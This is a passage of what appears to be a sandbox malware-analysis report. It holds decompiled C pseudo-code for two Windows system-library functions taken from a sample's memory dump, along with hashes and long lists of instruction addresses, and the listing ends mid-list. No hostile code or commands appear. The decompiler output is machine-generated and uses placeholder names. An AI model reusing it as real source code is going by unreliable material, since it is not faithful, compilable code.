                                                                                                                              0x1d78183e
                                                                                                                              0x1d781843
                                                                                                                              0x1d781844
                                                                                                                              0x00000000
                                                                                                                              0x1d78182c

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b303bfd068ab4bccc5cf67a744b314039d5ea161be2fd9dbc3cc2cbea5776ff7
                                                                                                                              • Instruction ID: fa9f714590bda482b948ad8af4317986e9492796755b8cdcdb08b91c857c29a9
                                                                                                                              • Opcode Fuzzy Hash: b303bfd068ab4bccc5cf67a744b314039d5ea161be2fd9dbc3cc2cbea5776ff7
                                                                                                                              • Instruction Fuzzy Hash: 0ED115719042059FDB41CF68D584BA67BF9FF08360F1541BAEE09DB216E731E905CBA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7437E4 Relevance: .3, Instructions: 303COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 87%
                                                                                                                              			E1D7437E4(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t108;
				intOrPtr _t111;
				intOrPtr _t112;
				char* _t122;
				signed short* _t132;
				signed short _t133;
				signed int _t134;
				intOrPtr _t135;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t145;
				intOrPtr* _t146;
				intOrPtr* _t147;
				intOrPtr* _t151;
				intOrPtr _t154;
				intOrPtr* _t157;
				intOrPtr _t170;
				intOrPtr _t172;
				signed int _t173;
				signed int _t174;
				intOrPtr _t175;
				intOrPtr _t178;
				signed short _t182;
				signed short _t183;
				signed int _t192;
				intOrPtr* _t195;
				short _t197;
				intOrPtr _t199;
				intOrPtr* _t202;
				intOrPtr _t203;
				void* _t204;

				_push(0x58);
				_push(0x1d81bc28);
				E1D797BE4(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t204 - 0x50)) = __ecx;
				 *((intOrPtr*)(_t204 - 0x1c)) = 0xc0000001;
				 *((intOrPtr*)(_t204 - 0x24)) = 0;
				 *((intOrPtr*)(__ecx)) = 0;
				 *(_t204 - 0x2c) = __edx & 0x00000001;
				_t108 = E1D74B920(__ecx,  *((intOrPtr*)( *[fs:0x30] + 8)));
				if(_t108 == 0) {
					_t197 = 0xc000007b;
					L33:
					 *[fs:0x0] =  *((intOrPtr*)(_t204 - 0x10));
					return _t197;
				}
				_t168 =  *((intOrPtr*)(_t108 + 0x60));
				 *((intOrPtr*)(_t204 - 0x40)) =  *((intOrPtr*)(_t108 + 0x60));
				_t199 =  *((intOrPtr*)(_t108 + 0x64));
				 *((intOrPtr*)(_t204 - 0x34)) = _t199;
				_t111 =  *((intOrPtr*)( *[fs:0x30] + 0x208));
				if(_t111 != 0) {
					if(_t199 < _t111) {
						 *((intOrPtr*)(_t204 - 0x34)) = _t111;
					}
				}
				_t112 =  *0x1d836644; // 0x0
				_t202 = E1D755D90(_t168,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t112 + 0x000c0000 | 0x00000008, 0x120);
				 *((intOrPtr*)(_t204 - 0x20)) = _t202;
				 *((intOrPtr*)(_t204 - 4)) = 0;
				 *((intOrPtr*)(_t204 - 0x4c)) = 1;
				if(_t202 == 0) {
					L41:
					_t197 = 0xc0000017;
					 *((intOrPtr*)(_t204 - 0x1c)) = 0xc0000017;
					goto L29;
				} else {
					_t170 =  *0x1d836644; // 0x0
					_t171 = _t170 + 0xc0000;
					 *((intOrPtr*)(_t204 - 0x54)) = _t170 + 0xc0000;
					_t172 = E1D755D90(_t170 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t171,  *0x1d836640 * 0x24);
					 *((intOrPtr*)(_t204 - 0x24)) = _t172;
					if(_t172 == 0) {
						_t197 = 0xc0000017;
						 *((intOrPtr*)(_t204 - 0x1c)) = 0xc0000017;
						_t202 =  *((intOrPtr*)(_t204 - 0x20));
						L29:
						 *((intOrPtr*)(_t204 - 4)) = 0xfffffffe;
						 *((intOrPtr*)(_t204 - 0x4c)) = 0;
						E1D743BA4(_t116, 0, _t197, _t202);
						if(_t197 < 0) {
							goto L33;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t204 - 0x50)))) = _t202;
						if(E1D753C40() != 0) {
							_t122 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							_t197 =  *((intOrPtr*)(_t204 - 0x1c));
							_t202 =  *((intOrPtr*)(_t204 - 0x20));
						} else {
							_t122 = 0x7ffe0386;
						}
						if( *_t122 != 0) {
							L37:
							E1D814DA7(_t202);
						}
						goto L33;
					}
					_t173 = 0;
					 *(_t204 - 0x28) = 0;
					_t203 =  *((intOrPtr*)(_t204 - 0x20));
					_t192 =  *0x1d836640; // 0x1
					while(_t173 < 3) {
						 *((intOrPtr*)(_t203 + 0x10 + _t173 * 4)) = _t192 * _t173 * 0xc +  *((intOrPtr*)(_t204 - 0x24));
						_t173 = _t173 + 1;
						 *(_t204 - 0x28) = _t173;
					}
					_t174 = 0;
					while(1) {
						 *(_t204 - 0x28) = _t174;
						if(_t174 >= _t192 * 3) {
							break;
						}
						_t157 = _t174 * 0xc +  *((intOrPtr*)(_t204 - 0x24));
						 *((intOrPtr*)(_t157 + 8)) = 0;
						 *((intOrPtr*)(_t157 + 4)) = _t157;
						 *_t157 = _t157;
						_t174 = _t174 + 1;
					}
					_t175 =  *0x1d836644; // 0x0
					_t176 = _t175 + 0xc0000;
					 *(_t204 - 0x58) = _t175 + 0xc0000;
					_t116 = E1D755D90(_t176 | 0x00000008,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t176 | 0x00000008, _t192 << 2);
					_t202 =  *((intOrPtr*)(_t204 - 0x20));
					 *((intOrPtr*)(_t202 + 0x1c)) = _t116;
					if(_t116 == 0) {
						goto L41;
					}
					_t178 =  *0x1d836644; // 0x0
					_t179 = _t178 + 0xc0000;
					 *(_t204 - 0x5c) = _t178 + 0xc0000;
					_t116 = E1D755D90(_t179 | 0x00000008,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t179 | 0x00000008,  *0x1d836640 * 0xc);
					_t202 =  *((intOrPtr*)(_t204 - 0x20));
					 *((intOrPtr*)(_t202 + 0x20)) = _t116;
					if(_t116 == 0) {
						goto L41;
					}
					_t37 = _t202 + 0x110; // 0x110
					_t132 = _t37;
					 *(_t204 - 0x3c) = _t132;
					_t133 =  *_t132;
					 *(_t204 - 0x30) = _t133;
					if(_t133 == 0) {
						_t133 =  *0x7ffe03c0;
						 *(_t204 - 0x30) = _t133;
					}
					 *(_t204 - 0x38) = _t133;
					_t202 =  *((intOrPtr*)(_t204 - 0x20));
					 *(_t202 + 0x100) = _t133;
					_t197 = L1D743722(_t202);
					 *((intOrPtr*)(_t204 - 0x1c)) = _t197;
					if(_t197 < 0) {
						goto L29;
					} else {
						 *((intOrPtr*)(_t202 + 0x104)) = 0xfffffffe;
						 *(_t204 - 0x68) = 0;
						 *((intOrPtr*)(_t204 - 0x64)) = 0;
						_t182 =  *(_t204 - 0x30);
						_t134 = _t182 & 0x0000ffff;
						 *(_t204 - 0x68) = _t134;
						 *(_t202 + 8) = _t134;
						 *((intOrPtr*)(_t202 + 0xc)) = 0;
						 *_t202 = 1;
						if(_t182 < 4) {
							_t183 = 4;
						} else {
							_t183 = _t182 + 1;
						}
						 *(_t204 - 0x30) = _t183;
						_t53 = _t202 + 0x28; // 0x28
						_t135 = _t53;
						 *((intOrPtr*)(_t204 - 0x44)) = _t135;
						_push(_t183);
						_push(0);
						_push(0x1f0003);
						_push(_t135);
						_t197 = E1D783470();
						 *((intOrPtr*)(_t204 - 0x1c)) = _t197;
						if(_t197 < 0) {
							goto L29;
						} else {
							 *((intOrPtr*)(_t204 - 4)) = 1;
							 *((intOrPtr*)(_t204 - 0x48)) = 1;
							_t139 =  *( *(_t204 - 0x3c));
							if(_t139 == 0) {
								_t139 =  *0x7ffe03c0;
							}
							_t140 = _t139 << 2;
							if(_t140 < 0x200) {
								_t140 = 0x200;
							}
							_t202 =  *((intOrPtr*)(_t204 - 0x20));
							_t60 = _t202 + 0x24; // 0x24
							_push( *((intOrPtr*)(_t204 - 0x34)));
							_push( *((intOrPtr*)(_t204 - 0x40)));
							_push(_t140);
							_push(_t202);
							_push(E1D7458E0);
							_push(0xffffffff);
							_push( *((intOrPtr*)( *((intOrPtr*)(_t204 - 0x44)))));
							_push(0);
							_push(0xf00ff);
							_t197 = E1D783670();
							 *((intOrPtr*)(_t204 - 0x1c)) = _t197;
							if(_t197 < 0) {
								L28:
								 *((intOrPtr*)(_t204 - 4)) = 0;
								 *((intOrPtr*)(_t204 - 0x48)) = 0;
								_t116 = E1D743B92(_t142, 0, _t197, _t202);
								goto L29;
							} else {
								if( *(_t204 - 0x2c) != 0) {
									_push(4);
									_push(_t204 - 0x2c);
									_push(0xd);
									_push( *((intOrPtr*)(_t202 + 0x24)));
									_t197 = E1D7843A0();
									 *((intOrPtr*)(_t204 - 0x1c)) = _t197;
									if(_t197 < 0) {
										goto L28;
									}
									 *((short*)(_t202 + 0xe6)) =  *(_t204 - 0x2c);
								}
								 *((intOrPtr*)(_t202 + 0x2c)) = 0;
								 *((intOrPtr*)(_t202 + 0xe0)) = 0;
								 *((intOrPtr*)(_t202 + 0x114)) = 0;
								 *((short*)(_t202 + 0xe4)) = 0;
								_t70 = _t202 + 0x30; // 0x30
								_t145 = _t70;
								 *((intOrPtr*)(_t145 + 4)) = _t145;
								 *_t145 = _t145;
								_t72 = _t202 + 0x38; // 0x38
								_t146 = _t72;
								 *((intOrPtr*)(_t146 + 4)) = _t146;
								 *_t146 = _t146;
								_t74 = _t202 + 0x118; // 0x118
								_t147 = _t74;
								 *((intOrPtr*)(_t147 + 4)) = _t147;
								 *_t147 = _t147;
								E1D744A09(_t202, _t204 - 0x60, 0);
								_t202 =  *((intOrPtr*)(_t204 - 0x20));
								 *((intOrPtr*)(_t202 + 0xf0)) =  *((intOrPtr*)(_t204 + 4));
								_t80 = _t202 + 0x40; // 0x40
								_t197 = E1D744077(_t80, _t202);
								 *((intOrPtr*)(_t204 - 0x1c)) = _t197;
								if(_t197 < 0) {
									goto L28;
								}
								_t197 = 0;
								 *((intOrPtr*)(_t204 - 0x1c)) = 0;
								L1D752330(_t142, 0x1d836884);
								 *((intOrPtr*)(_t204 - 4)) = 2;
								_t84 = _t202 + 0xe8; // 0xe8
								_t151 = _t84;
								_t195 =  *0x1d833424; // 0x1b08110
								if( *_t195 != 0x1d833420) {
									_push(3);
									asm("int 0x29");
									goto L37;
								}
								 *_t151 = 0x1d833420;
								 *((intOrPtr*)(_t151 + 4)) = _t195;
								 *_t195 = _t151;
								 *0x1d833424 = _t151;
								 *((intOrPtr*)(_t204 - 4)) = 1;
								E1D743B87();
								L1D7453C0(0x1d836898);
								_t154 =  *0x1d836974; // 0x0
								if(_t154 != 0) {
									_t197 = E1D814000(0x1d833420, _t202, 0x1d834120, _t154);
									 *((intOrPtr*)(_t204 - 0x1c)) = _t197;
								}
								_t142 = E1D7452F0(0x1d833420, 0x1d836898);
								goto L28;
							}
						}
					}
				}
			}


































                                                                                                                              0x1d7437e4
                                                                                                                              0x1d7437e6
                                                                                                                              0x1d7437eb
                                                                                                                              0x1d7437f0
                                                                                                                              0x1d7437f3
                                                                                                                              0x1d7437fc
                                                                                                                              0x1d7437ff
                                                                                                                              0x1d743804
                                                                                                                              0x1d743810
                                                                                                                              0x1d743817
                                                                                                                              0x1d79fdfd
                                                                                                                              0x1d743b4c
                                                                                                                              0x1d743b51
                                                                                                                              0x1d743b5d
                                                                                                                              0x1d743b5d
                                                                                                                              0x1d74381d
                                                                                                                              0x1d743820
                                                                                                                              0x1d743823
                                                                                                                              0x1d743826
                                                                                                                              0x1d74382f
                                                                                                                              0x1d743837
                                                                                                                              0x1d79fe09
                                                                                                                              0x1d79fe0f
                                                                                                                              0x1d79fe0f
                                                                                                                              0x1d79fe09
                                                                                                                              0x1d74383d
                                                                                                                              0x1d74385e
                                                                                                                              0x1d743860
                                                                                                                              0x1d743863
                                                                                                                              0x1d743866
                                                                                                                              0x1d74386f
                                                                                                                              0x1d79fe17
                                                                                                                              0x1d79fe17
                                                                                                                              0x1d79fe1c
                                                                                                                              0x00000000
                                                                                                                              0x1d743875
                                                                                                                              0x1d743875
                                                                                                                              0x1d74387b
                                                                                                                              0x1d743881
                                                                                                                              0x1d74389b
                                                                                                                              0x1d74389d
                                                                                                                              0x1d7438a2
                                                                                                                              0x1d79fe24
                                                                                                                              0x1d79fe29
                                                                                                                              0x1d79fe2c
                                                                                                                              0x1d743b19
                                                                                                                              0x1d743b19
                                                                                                                              0x1d743b20
                                                                                                                              0x1d743b27
                                                                                                                              0x1d743b2e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d743b33
                                                                                                                              0x1d743b3c
                                                                                                                              0x1d79ff3f
                                                                                                                              0x1d79ff44
                                                                                                                              0x1d79ff47
                                                                                                                              0x1d743b42
                                                                                                                              0x1d743b42
                                                                                                                              0x1d743b42
                                                                                                                              0x1d743b4a
                                                                                                                              0x1d743bbb
                                                                                                                              0x1d743bbd
                                                                                                                              0x1d743bbd
                                                                                                                              0x00000000
                                                                                                                              0x1d743b4a
                                                                                                                              0x1d7438a8
                                                                                                                              0x1d7438aa
                                                                                                                              0x1d7438ad
                                                                                                                              0x1d7438b0
                                                                                                                              0x1d7438b6
                                                                                                                              0x1d7438c6
                                                                                                                              0x1d7438ca
                                                                                                                              0x1d7438cb
                                                                                                                              0x1d7438cb
                                                                                                                              0x1d7438d0
                                                                                                                              0x1d7438d2
                                                                                                                              0x1d7438d2
                                                                                                                              0x1d7438da
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7438df
                                                                                                                              0x1d7438e2
                                                                                                                              0x1d7438e5
                                                                                                                              0x1d7438e8
                                                                                                                              0x1d7438ea
                                                                                                                              0x1d7438ea
                                                                                                                              0x1d7438ed
                                                                                                                              0x1d7438f3
                                                                                                                              0x1d7438f9
                                                                                                                              0x1d74390f
                                                                                                                              0x1d743914
                                                                                                                              0x1d743917
                                                                                                                              0x1d74391c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d743922
                                                                                                                              0x1d743928
                                                                                                                              0x1d74392e
                                                                                                                              0x1d743946
                                                                                                                              0x1d74394b
                                                                                                                              0x1d74394e
                                                                                                                              0x1d743953
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d743959
                                                                                                                              0x1d743959
                                                                                                                              0x1d74395f
                                                                                                                              0x1d743962
                                                                                                                              0x1d743964
                                                                                                                              0x1d743969
                                                                                                                              0x1d74396b
                                                                                                                              0x1d743970
                                                                                                                              0x1d743970
                                                                                                                              0x1d743973
                                                                                                                              0x1d743976
                                                                                                                              0x1d743979
                                                                                                                              0x1d743986
                                                                                                                              0x1d743988
                                                                                                                              0x1d74398d
                                                                                                                              0x00000000
                                                                                                                              0x1d743993
                                                                                                                              0x1d743993
                                                                                                                              0x1d74399d
                                                                                                                              0x1d7439a0
                                                                                                                              0x1d7439a3
                                                                                                                              0x1d7439a6
                                                                                                                              0x1d7439a9
                                                                                                                              0x1d7439ac
                                                                                                                              0x1d7439af
                                                                                                                              0x1d7439b2
                                                                                                                              0x1d7439bb
                                                                                                                              0x1d79fe36
                                                                                                                              0x1d7439c1
                                                                                                                              0x1d7439c1
                                                                                                                              0x1d7439c1
                                                                                                                              0x1d7439c2
                                                                                                                              0x1d7439c5
                                                                                                                              0x1d7439c5
                                                                                                                              0x1d7439c8
                                                                                                                              0x1d7439cb
                                                                                                                              0x1d7439cc
                                                                                                                              0x1d7439cd
                                                                                                                              0x1d7439d2
                                                                                                                              0x1d7439d8
                                                                                                                              0x1d7439da
                                                                                                                              0x1d7439df
                                                                                                                              0x00000000
                                                                                                                              0x1d7439e5
                                                                                                                              0x1d7439e8
                                                                                                                              0x1d7439eb
                                                                                                                              0x1d7439f1
                                                                                                                              0x1d7439f5
                                                                                                                              0x1d7439f7
                                                                                                                              0x1d7439f7
                                                                                                                              0x1d7439fc
                                                                                                                              0x1d743a06
                                                                                                                              0x1d743a08
                                                                                                                              0x1d743a08
                                                                                                                              0x1d743a0a
                                                                                                                              0x1d743a0d
                                                                                                                              0x1d743a10
                                                                                                                              0x1d743a13
                                                                                                                              0x1d743a16
                                                                                                                              0x1d743a17
                                                                                                                              0x1d743a18
                                                                                                                              0x1d743a1d
                                                                                                                              0x1d743a22
                                                                                                                              0x1d743a24
                                                                                                                              0x1d743a25
                                                                                                                              0x1d743a30
                                                                                                                              0x1d743a32
                                                                                                                              0x1d743a37
                                                                                                                              0x1d743b0a
                                                                                                                              0x1d743b0a
                                                                                                                              0x1d743b0d
                                                                                                                              0x1d743b14
                                                                                                                              0x00000000
                                                                                                                              0x1d743a3d
                                                                                                                              0x1d743a41
                                                                                                                              0x1d743b5e
                                                                                                                              0x1d743b63
                                                                                                                              0x1d743b64
                                                                                                                              0x1d743b66
                                                                                                                              0x1d743b6e
                                                                                                                              0x1d743b70
                                                                                                                              0x1d743b75
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d743b7b
                                                                                                                              0x1d743b7b
                                                                                                                              0x1d743a47
                                                                                                                              0x1d743a4a
                                                                                                                              0x1d743a50
                                                                                                                              0x1d743a56
                                                                                                                              0x1d743a5d
                                                                                                                              0x1d743a5d
                                                                                                                              0x1d743a60
                                                                                                                              0x1d743a63
                                                                                                                              0x1d743a65
                                                                                                                              0x1d743a65
                                                                                                                              0x1d743a68
                                                                                                                              0x1d743a6b
                                                                                                                              0x1d743a6d
                                                                                                                              0x1d743a6d
                                                                                                                              0x1d743a73
                                                                                                                              0x1d743a76
                                                                                                                              0x1d743a7e
                                                                                                                              0x1d743a86
                                                                                                                              0x1d743a89
                                                                                                                              0x1d743a8f
                                                                                                                              0x1d743a99
                                                                                                                              0x1d743a9b
                                                                                                                              0x1d743aa0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d743aa2
                                                                                                                              0x1d743aa4
                                                                                                                              0x1d743aac
                                                                                                                              0x1d743ab1
                                                                                                                              0x1d743ab8
                                                                                                                              0x1d743ab8
                                                                                                                              0x1d743abe
                                                                                                                              0x1d743acb
                                                                                                                              0x1d743bb6
                                                                                                                              0x1d743bb9
                                                                                                                              0x00000000
                                                                                                                              0x1d743bb9
                                                                                                                              0x1d743ad1
                                                                                                                              0x1d743ad3
                                                                                                                              0x1d743ad6
                                                                                                                              0x1d743ad8
                                                                                                                              0x1d743add
                                                                                                                              0x1d743ae4
                                                                                                                              0x1d743aee
                                                                                                                              0x1d743af3
                                                                                                                              0x1d743afa
                                                                                                                              0x1d79fe55
                                                                                                                              0x1d79fe57
                                                                                                                              0x1d79fe57
                                                                                                                              0x1d743b05
                                                                                                                              0x00000000
                                                                                                                              0x1d743b05
                                                                                                                              0x1d743a37
                                                                                                                              0x1d7439df
                                                                                                                              0x1d74398d

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 496997c1be4da09e956213b9e5b78475e804f367a99254dbd125db1d863b95e7
                                                                                                                              • Instruction ID: 1fa806d2a4317402be13397e6e1f93c01b12534ba2f17a2429cc54bffcc03407
                                                                                                                              • Opcode Fuzzy Hash: 496997c1be4da09e956213b9e5b78475e804f367a99254dbd125db1d863b95e7
                                                                                                                              • Instruction Fuzzy Hash: D7C167B5940645DFCB16CF98D880BADBBF4FF48764F21842AE519EB360E734A901CB51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7C5D60 Relevance: .3, Instructions: 264COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E1D7C5D60(signed char* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _t85;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				intOrPtr _t106;
				signed int _t109;
				signed int _t113;
				signed int _t115;
				void* _t126;
				void* _t127;
				signed int _t131;
				intOrPtr _t132;
				intOrPtr _t134;
				void* _t135;
				void* _t138;
				signed int _t141;
				void* _t143;
				signed int _t145;
				signed int _t146;
				signed int _t153;
				void* _t154;
				signed int _t155;
				signed int _t156;
				intOrPtr _t157;
				signed int _t160;
				intOrPtr _t164;
				signed char* _t165;
				signed int _t167;

				_v24 = 0;
				_t163 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t138 = 8;
				_t156 = _t138;
				_v32 = 0;
				_v16 = _t156;
				_v20 = 0;
				_v12 = 0;
				_v8 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_v28 = 0;
				if(_a8 <= 0) {
					L13:
					_t143 = 0x14;
					if(_t138 == 8) {
						L16:
						if(_t156 == 8) {
							L19:
							_t85 =  *0x1d835d78; // 0x0
							_t164 = E1D755D90(_t143, _t163, _t85 + 0x140000, _t143);
							if(_t164 == 0) {
								L27:
								_t167 = 0xc0000017;
								L52:
								return _t167;
							}
							_t28 = _t164 + 0x14; // 0x14
							_t89 = _t28;
							if(_t138 == 8) {
								L23:
								_t144 = _v16;
								if(_v16 == 8) {
									L25:
									_t90 =  *0x1d835d78; // 0x0
									_t139 = _v8;
									_t92 = E1D755D90(_t144, _v8, _t90 + 0x140000, _v20);
									_v12 = _t92;
									if(_t92 != 0) {
										_v36 = _v36 & 0x00000000;
										__eflags = _a8;
										if(_a8 <= 0) {
											L42:
											_t167 = E1D768770(_t164, 1);
											__eflags = _t167;
											if(_t167 < 0) {
												L49:
												E1D753BC0(_t139, 0, _t164);
												L50:
												_t95 = _v12;
												if(_v12 != 0) {
													E1D753BC0(_t139, 0, _t95);
												}
												goto L52;
											}
											_t167 = E1D768710(_t164, _a12, 0);
											__eflags = _t167;
											if(_t167 < 0) {
												goto L49;
											}
											_t167 = E1D7686B0(_t164, _a16, 0);
											__eflags = _t167;
											if(_t167 < 0) {
												goto L49;
											}
											_t167 = E1D768640(_t164, 1, _v24, 0);
											__eflags = _t167;
											if(_t167 < 0) {
												goto L49;
											}
											__eflags = _v32;
											_t167 = E1D777F70(_t164, (_v32 & 0xffffff00 | _v32 != 0x00000000) & 0x000000ff, _v32, 0);
											__eflags = _t167;
											if(_t167 < 0) {
												goto L49;
											}
											_t167 = 0;
											 *_a20 = _t164;
											goto L50;
										}
										_t141 =  &(_a4[4]);
										__eflags = _t141;
										do {
											_t157 = 0;
											_t106 =  *((intOrPtr*)( *((intOrPtr*)(_t141 + 4))));
											_v28 = _t106;
											_t145 = 8 + ( *(_t106 + 1) & 0x000000ff) * 4;
											_t109 =  *(_t141 - 4) & 0x000000ff;
											__eflags = _t109;
											if(_t109 == 0) {
												_t146 = _t145 + 0xc;
												__eflags = _t146;
												_v20 = _v24;
												_v16 = _t146;
												_t113 = E1D7C6844(_v12, _t146,  *(_t141 - 3) & 0x000000ff,  *(_t141 - 2) & 0x000000ff,  *_t141, _v28);
												L37:
												_t145 = _v16;
												_t167 = _t113;
												_t157 = _v20;
												L38:
												__eflags = _t167;
												if(__eflags < 0) {
													L48:
													_t139 = _v8;
													goto L49;
												}
												_t167 = E1D73AFD0(_t145, __eflags, _t157, 2, 0xffffffff, _v12, _t145);
												__eflags = _t167;
												if(_t167 < 0) {
													goto L48;
												}
												goto L40;
											}
											_t115 = _t109 - 1;
											__eflags = _t115;
											if(_t115 == 0) {
												_v20 = _v24;
												_v16 = _t145 + 0xc;
												_t113 = E1D7C68BC(_v12, _t145 + 0xc,  *(_t141 - 3) & 0x000000ff,  *(_t141 - 2) & 0x000000ff,  *_t141, _v28);
												goto L37;
											}
											__eflags = _t115 != 1;
											if(_t115 != 1) {
												goto L38;
											}
											_v20 = _v32;
											_v16 = _t145 + 0xc;
											_t113 = E1D7C6880(_v12, _t145 + 0xc,  *(_t141 - 3) & 0x000000ff,  *(_t141 - 2) & 0x000000ff,  *_t141, _v28);
											goto L37;
											L40:
											_t141 = _t141 + 0xc;
											_t160 = _v36 + 1;
											_v36 = _t160;
											__eflags = _t160 - _a8;
										} while (_t160 < _a8);
										_t139 = _v8;
										goto L42;
									}
									_t167 = 0xc0000017;
									goto L49;
								}
								_v32 = _t89;
								_t167 = E1D767C20(_t89, _t144, 2);
								if(_t167 < 0) {
									goto L48;
								}
								goto L25;
							}
							_v24 = _t89;
							_v36 = _t89 + _t138;
							_t167 = E1D767C20(_t89, _t138, 2);
							if(_t167 < 0) {
								goto L48;
							}
							_t89 = _v36;
							goto L23;
						}
						_t126 = _t143 + _t156;
						if(_t126 < _t143) {
							goto L27;
						}
						_t143 = _t126;
						goto L19;
					}
					_t26 = _t138 + 0x14; // 0x1c
					_t127 = _t26;
					if(_t127 < _t143) {
						goto L27;
					}
					_t143 = _t127;
					goto L16;
				}
				_t165 = _a4;
				do {
					_t153 =  *( *(_t165[8]) + 1) & 0x000000ff;
					_t131 =  *_t165 & 0x000000ff;
					if(_t131 == 0) {
						L7:
						_t132 = 0x14 + _t153 * 4;
						_t154 = _t132 + _t138;
						__eflags = _t154 - _t138;
						if(_t154 < _t138) {
							goto L27;
						}
						_t138 = _t154;
						goto L9;
					}
					_t135 = _t131 - 1;
					if(_t135 == 0) {
						goto L7;
					}
					if(_t135 != 1) {
						return 0xc000000d;
					}
					_t132 = 0x14 + _t153 * 4;
					_t155 = _t132 + _t156;
					if(_t155 < _t156) {
						goto L27;
					}
					_t156 = _t155;
					_v16 = _t156;
					L9:
					if(_v20 <= _t132) {
						_v20 = _t132;
					}
					_t165 =  &(_t165[0xc]);
					_t134 = _v28 + 1;
					_v28 = _t134;
				} while (_t134 < _a8);
				_t163 = _v8;
				goto L13;
			}







































                                                                                                                              0x1d7c5d74
                                                                                                                              0x1d7c5d78
                                                                                                                              0x1d7c5d7d
                                                                                                                              0x1d7c5d7f
                                                                                                                              0x1d7c5d80
                                                                                                                              0x1d7c5d83
                                                                                                                              0x1d7c5d86
                                                                                                                              0x1d7c5d89
                                                                                                                              0x1d7c5d8c
                                                                                                                              0x1d7c5d8f
                                                                                                                              0x1d7c5d95
                                                                                                                              0x1d7c5e00
                                                                                                                              0x1d7c5e02
                                                                                                                              0x1d7c5e06
                                                                                                                              0x1d7c5e15
                                                                                                                              0x1d7c5e18
                                                                                                                              0x1d7c5e27
                                                                                                                              0x1d7c5e27
                                                                                                                              0x1d7c5e39
                                                                                                                              0x1d7c5e3d
                                                                                                                              0x1d7c5ead
                                                                                                                              0x1d7c5ead
                                                                                                                              0x1d7c602c
                                                                                                                              0x00000000
                                                                                                                              0x1d7c602c
                                                                                                                              0x1d7c5e3f
                                                                                                                              0x1d7c5e3f
                                                                                                                              0x1d7c5e45
                                                                                                                              0x1d7c5e67
                                                                                                                              0x1d7c5e67
                                                                                                                              0x1d7c5e6d
                                                                                                                              0x1d7c5e85
                                                                                                                              0x1d7c5e85
                                                                                                                              0x1d7c5e8d
                                                                                                                              0x1d7c5e97
                                                                                                                              0x1d7c5e9c
                                                                                                                              0x1d7c5ea1
                                                                                                                              0x1d7c5ec1
                                                                                                                              0x1d7c5ec5
                                                                                                                              0x1d7c5ec9
                                                                                                                              0x1d7c5fa9
                                                                                                                              0x1d7c5fb1
                                                                                                                              0x1d7c5fb3
                                                                                                                              0x1d7c5fb5
                                                                                                                              0x1d7c6013
                                                                                                                              0x1d7c6017
                                                                                                                              0x1d7c601c
                                                                                                                              0x1d7c601c
                                                                                                                              0x1d7c6021
                                                                                                                              0x1d7c6027
                                                                                                                              0x1d7c6027
                                                                                                                              0x00000000
                                                                                                                              0x1d7c6021
                                                                                                                              0x1d7c5fc2
                                                                                                                              0x1d7c5fc4
                                                                                                                              0x1d7c5fc6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5fd3
                                                                                                                              0x1d7c5fd5
                                                                                                                              0x1d7c5fd7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5fe6
                                                                                                                              0x1d7c5fe8
                                                                                                                              0x1d7c5fea
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5fef
                                                                                                                              0x1d7c6001
                                                                                                                              0x1d7c6003
                                                                                                                              0x1d7c6005
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c6007
